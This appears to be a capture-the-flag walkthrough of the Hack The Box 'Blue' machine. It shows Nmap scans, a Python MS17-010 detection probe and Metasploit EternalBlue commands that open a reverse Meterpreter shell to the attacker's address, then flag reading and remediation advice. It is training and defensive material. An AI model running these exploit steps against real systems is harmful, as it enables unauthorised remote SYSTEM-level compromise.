Keep Calm and Hack The Box – Blue

Greetings, fellow hackers! Today, we embark on an exciting journey into the realm of Hack The Box (HTB), an online platform that allows cybersecurity enthusiasts to test and sharpen their penetration testing skills. HTB offers a plethora of challenges that simulate real-world scenarios, ranging from easy to mind-bendingly difficult.

In this post, we’ll be exploring the retired machine named Blue. Don’t let the name fool you: while it is one of the easier boxes on HTB, it showcases the notorious EternalBlue exploit, the same one the WannaCry ransomware used in May 2017 to cripple organisations worldwide. So put on your hacker hat and grab your trusty Kali Linux box, because we’re about to dive in!

Step 1: Recon Like a Pro

Before we start throwing exploits left and right, we need to do some reconnaissance. This crucial step helps us gather information about our target and identify potential entry points. Remember, a skilled hacker spends more time in recon than actual exploitation!

Our weapon of choice for reconnaissance is the almighty Nmap (Network Mapper). This versatile tool allows us to discover hosts, scan for open ports, and fingerprint services. Let’s kick things off with an aggressive scan of the Blue machine (the name blue.htb resolves through an /etc/hosts entry pointing at the box’s VPN address, 10.10.10.40; using the raw IP works just as well):

nmap -A -v blue.htb

The -A flag turns on OS detection, service version detection, the default NSE script set and traceroute in one go, while -v increases the verbosity of the output so results appear as they come in. Note that without -p- the scan covers only Nmap’s top 1000 TCP ports, which is enough here. Grab a cup of coffee while Nmap does its magic.

The results reveal some juicy details:

  • The target is running Windows 7 Professional SP1 (build 7601)
  • Port 445 (SMB) is open; the host negotiates SMB 2.1 with a modern client, but that does not mean SMBv1 is turned off, which is the dialect that matters for what follows
  • The computer name is haris-PC

SMB (Server Message Block) is a protocol used for file sharing on Windows networks. Seeing it open piques our interest, as it has a history of notorious vulnerabilities.

Let’s confirm whether the Blue machine is vulnerable to the infamous EternalBlue exploit (MS17-010) using an Nmap script. The whole vuln category works, but the script that actually matters here is smb-vuln-ms17-010, so you can also run it on its own with --script smb-vuln-ms17-010 to keep the scan quiet and quick:

nmap --script vuln -p 445 blue.htb

Bingo! The smb-vuln-ms17-010 output reports the host as VULNERABLE to the "Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)". Under the hood the script does not exploit anything: it opens an anonymous SMBv1 session to the IPC$ share and sends a harmless transaction on an invalid file handle, and the specific error code an unpatched server returns gives the game away. We’ve found our entry point!
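To show what that Nmap script actually does on the wire, here is an added example (my own code, not part of the original post and not the code of nmap or Metasploit) that reproduces the MS17-010 probe used by smb-vuln-ms17-010 and by Metasploit’s auxiliary/scanner/smb/smb_ms17_010: negotiate SMBv1, open a null session, tree-connect to IPC$, then send an SMB_COM_TRANSACTION with the PeekNamedPipe subcommand (0x23) against FID 0, which never refers to an open file. An unpatched host answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), a patched one STATUS_NOT_IMPLEMENTED (0xC0000002). It assumes the target allows an anonymous IPC$ session (Blue does); the buffer sizes and native-OS strings in the packets are arbitrary client choices, and the default target 10.10.10.40 is simply the box address from this walkthrough.

```python
#!/usr/bin/env python3
"""Minimal MS17-010 probe over SMBv1 (added example, not the page's own code).

Exchange modelled on nmap's smb-vuln-ms17-010 / Metasploit's smb_ms17_010:
negotiate -> null session setup -> tree connect IPC$ -> TRANSACTION PeekNamedPipe on FID 0.
Unpatched: STATUS_INSUFF_SERVER_RESOURCES (0xC0000205). Patched: STATUS_NOT_IMPLEMENTED.
Buffer sizes and OS strings below are arbitrary client choices (assumptions).
"""
import socket
import struct
import sys

HEADER_FMT = "<4sBIBHH8sHHHHH"            # the fixed 32-byte SMB1 header
SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS_PEEK_NMPIPE = 0x23

VERDICTS = {
    0xC0000205: ("STATUS_INSUFF_SERVER_RESOURCES", "likely VULNERABLE (MS17-010 not applied)"),
    0xC0000002: ("STATUS_NOT_IMPLEMENTED", "patched"),
    0xC0000022: ("STATUS_ACCESS_DENIED", "probe blocked, result unknown"),
}

def smb_header(command, status=0, tid=0, uid=0, mid=1):
    """SMB1 header: flags 0x18 (case-insensitive, canonical paths), flags2 0x4001 (NT status + long names)."""
    return struct.pack(HEADER_FMT, b"\xffSMB", command, status, 0x18, 0x4001,
                       0, b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)

def parse_header(smb):
    """Return (command, nt_status, tid, uid) from a raw SMB1 message."""
    fields = struct.unpack(HEADER_FMT, smb[:32])
    if fields[0] != b"\xffSMB":
        raise ValueError("not an SMBv1 reply (SMBv1 disabled, or SMB2 answered)")
    return fields[1], fields[2], fields[8], fields[10]

def netbios(smb):
    """NetBIOS session service framing: type 0x00 plus a 3-byte big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"          # offer only the SMBv1 NT LM 0.12 dialect
    return netbios(smb_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(dialects)) + dialects)

def session_setup_request():
    # Null session: 1-byte OEM password, empty account and domain, then native OS / LAN Manager strings.
    data = b"\x00\x00\x00" + b"Unix\x00" + b"Samba\x00"
    words = struct.pack("<BBBHHHHIHHII", 13, 0xFF, 0, 0, 4356, 10, 0, 0, 1, 0, 0, 0x50)
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX) + words + struct.pack("<H", len(data)) + data)

def tree_connect_request(host, uid):
    data = b"\x00" + f"\\\\{host}\\IPC$".encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBBHHH", 4, 0xFF, 0, 0, 0, 1)   # PasswordLength = 1 (the null byte)
    return netbios(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + words + struct.pack("<H", len(data)) + data)

def peek_named_pipe_request(tid, uid, fid=0):
    """SMB_COM_TRANSACTION, 16 parameter words, setup = [PeekNamedPipe, FID]; FID 0 is never valid."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)      # parameter/data offset (both counts are zero)
    words = struct.pack("<BHHHHBBHIHHHHHBBHH", 16, 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0,
                        0, 0, offset, 0, offset, 2, 0, TRANS_PEEK_NMPIPE, fid)
    return netbios(smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + words + struct.pack("<H", len(name)) + name)

def verdict(status):
    return VERDICTS.get(status, (f"0x{status:08X}", "unexpected status, result unknown"))

def recv_smb(sock):
    """Read one NetBIOS-framed message; an empty read means the server hung up on us."""
    def exact(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("server closed the connection (SMBv1 refused?)")
            buf += chunk
        return buf
    return exact(int.from_bytes(exact(4)[1:], "big"))

def probe(host, port=445, timeout=5):
    """Run the four-message exchange; return (nt_status, (status_name, meaning))."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(negotiate_request())
        parse_header(recv_smb(sock))            # raises if the server does not speak SMBv1
        sock.sendall(session_setup_request())
        _, status, _, uid = parse_header(recv_smb(sock))
        if status:
            raise RuntimeError(f"null session refused: {verdict(status)[0]}")
        sock.sendall(tree_connect_request(host, uid))
        _, status, tid, _ = parse_header(recv_smb(sock))
        if status:
            raise RuntimeError(f"IPC$ tree connect failed: {verdict(status)[0]}")
        sock.sendall(peek_named_pipe_request(tid, uid))
        _, status, _, _ = parse_header(recv_smb(sock))
    return status, verdict(status)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.40"   # Blue's address in this walkthrough
    name, meaning = probe(target)[1]
    print(f"{target}: {name} -> {meaning}")
```

Run it as `python3 ms17_010_probe.py 10.10.10.40`. Because the probe never sends the overflow, it is safe to point at production hosts during an assessment, and the ValueError/ConnectionError paths double as a quick audit of whether a host still accepts SMBv1 at all.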

EternalBlue: The Exploit That Shook the World

Before we unleash EternalBlue on the Blue machine, let’s take a moment to understand its significance. Developed by the U.S. National Security Agency (NSA), EternalBlue exploits a vulnerability (CVE-2017-0144) in Microsoft’s implementation of the Server Message Block version 1 (SMBv1) protocol. Microsoft’s bulletin MS17-010 fixed that bug together with several sibling SMBv1 flaws (CVE-2017-0143 through CVE-2017-0148), which is why the patch name, not the CVE, is what scanners report.

In layman’s terms, the SMBv1 server code in the kernel driver srv.sys miscalculates a buffer size when it converts a list of OS/2-style extended attributes (FEAs) to the NT format, so a specially crafted transaction can overflow a kernel pool buffer. Because the bug sits in kernel code that is reachable before any authentication, a successful exploit yields remote code execution with SYSTEM privileges, effectively giving the attacker full control over the machine.

The exploit was leaked by the Shadow Brokers hacker group in April 2017, a month after Microsoft released patches for the vulnerability in March 2017. However, many organizations were slow to patch, and in May 2017 the WannaCry ransomware used EternalBlue as a worm propagation mechanism, spreading from host to host over port 445 to devastating effect.

The incident highlighted the importance of timely patching and the risks associated with legacy protocols like SMBv1. It was a wake-up call for organizations to prioritize cybersecurity and adopt a proactive approach to vulnerability management.

Unleashing EternalBlue on the Blue Machine

Now that we understand the gravity of EternalBlue, let’s use it to compromise the Blue machine. We’ll harness the power of Metasploit, a framework that makes exploitation a breeze.

Fire up Metasploit on your Kali Linux box and search for EternalBlue-related modules:

msf> search eternalblue

The search reveals several modules, including the auxiliary/scanner/smb/smb_ms17_010 checker that performs the same test as the Nmap script. We’re interested in the exploit module specifically targeting Windows 7 and Server 2008 R2 (which matches our target):

msf> use exploit/windows/smb/ms17_010_eternalblue

Let’s check the options and set the necessary parameters:

msf exploit(ms17_010_eternalblue) > show options

We need to set the target address and our own. Current Metasploit versions name the target option RHOSTS (RHOST is still accepted as an alias), and LHOST is the address the default windows/x64/meterpreter/reverse_tcp payload will connect back to, so it must be your HTB VPN address (tun0), not your LAN address. You can find your HTB VPN IP address on the access page or with ip addr show tun0.

msf exploit(ms17_010_eternalblue) > set RHOST 10.10.10.40
msf exploit(ms17_010_eternalblue) > set LHOST 10.10.14.24

Double-check the settings and let’s rock and roll!

msf exploit(ms17_010_eternalblue) > run

If all goes well, you should see a flurry of activity as the exploit does its magic, ending in a WIN banner and a Meterpreter session running as SYSTEM. If it fails, simply run it again: the exploit depends on kernel pool grooming and is not deterministic, and a failed attempt can also crash the target, which on HTB means resetting the box, but in a real engagement means an outage, so get the client’s blessing before firing it at production systems. Feel the power coursing through your veins!

Flag Hunting: Capturing the User and Root Flags

With our shiny Meterpreter shell, it’s time to hunt for those coveted flags. Let’s start by checking our user context:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We’re already running as NT AUTHORITY\SYSTEM, the local account with the highest privileges on a Windows machine, because the exploit runs inside the kernel and there is no user account in the picture at all. No privilege escalation step is needed, and we have unrestricted access to every file on the box. Let the flag hunt begin!

User Flag:

  1. Navigate to the C:\Users\haris\Desktop directory
  2. Locate the user.txt file and display its contents
meterpreter > cd C:\\Users\\haris\\Desktop
meterpreter > cat user.txt

Root Flag:

  1. Navigate to the C:\Users\Administrator\Desktop directory
  2. Locate the root.txt file and display its contents
meterpreter > cd C:\\Users\\Administrator\\Desktop
meterpreter > cat root.txt

Congratulations! You’ve successfully owned the Blue machine and captured both flags. Take a moment to bask in the glory of your accomplishment!

Lessons Learned and Remediations

While hacking the Blue machine was an exhilarating experience, it’s crucial to understand the real-world implications and learn from them. Here are some key takeaways and remediation steps:

  1. Patch Management: The Blue machine was vulnerable because it was missing the MS17-010 patch (for Windows 7 SP1 that is KB4012212, the security-only update, or KB4012215, the monthly rollup). Organizations must have a robust patch management process to ensure timely deployment of security updates. Regularly assess systems for missing patches, verify the fix actually landed (for example with the same smb-vuln-ms17-010 scan used above), and prioritize critical ones.

  2. Disable SMBv1: SMBv1 is an outdated and insecure protocol, and EternalBlue only works when the server still accepts it. Modern Windows versions have SMBv2 and SMBv3, which offer improved performance and security, and Windows 10 stopped installing SMBv1 by default from version 1709. On Windows 8.1 / Server 2012 R2 and later, Set-SmbServerConfiguration -EnableSMB1Protocol $false turns the server side off; on Windows 7 / Server 2008 R2 the SMB1 value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters must be set to 0 as described in Microsoft KB2696547. Disable SMBv1 wherever it’s not explicitly required to reduce the attack surface, and scan for hosts that still negotiate it.

  3. Network Segmentation: Implement network segmentation to limit the lateral movement of attackers. Use firewalls and VLANs to separate critical assets and restrict access between network segments; in particular, TCP 445 (and 139) should be blocked at the perimeter and between workstation subnets, since WannaCry spread precisely because those ports were reachable host to host. This can contain the impact of a breach.

  4. Principle of Least Privilege: Assign users and services the minimum privileges required to perform their tasks. Avoid using administrative accounts for daily activities. Be clear about what this does and does not buy you: EternalBlue is an unauthenticated kernel exploit, so least privilege does not stop the initial compromise of an unpatched host, but it limits what an attacker can reach from a compromised user account and the credentials they can harvest for further movement.

  5. Monitor and Detect: Implement security monitoring solutions to detect and alert on suspicious activities, such as SMBv1 negotiations on the network, hosts opening port 445 to many peers in a short time, or unauthorized file access attempts. Network IDS rule sets carry signatures for the MS17-010 probe and for EternalBlue itself. Regularly review logs and investigate any deviations from the baseline.

  6. Educate and Train: Foster a culture of cybersecurity awareness among employees. Conduct regular training sessions on identifying and reporting suspicious activities, such as phishing attempts or unusual system behavior. Informed employees can act as an additional line of defense.

Conclusion

Hacking the Blue machine on Hack The Box has been an enlightening journey. We explored the infamous EternalBlue exploit, which exploited a vulnerability in SMBv1 to gain remote code execution. We leveraged the power of Nmap for reconnaissance, Metasploit for exploitation, and Meterpreter for post-exploitation.

But beyond the thrill of capturing flags, we learned valuable lessons about the importance of timely patching, disabling insecure protocols, implementing network segmentation, and adhering to the principle of least privilege. As aspiring cybersecurity professionals, it’s our responsibility to not only sharpen our technical skills but also understand the broader context and implications of the vulnerabilities we exploit.

Remember, ethical hacking is about more than just breaking into systems. It’s about learning from our findings, promoting best practices, and ultimately making the digital world a safer place. So keep calm, hack responsibly, and never stop learning!

Until next time, fellow hackers. May your exploits be successful, and your flags be plentiful!
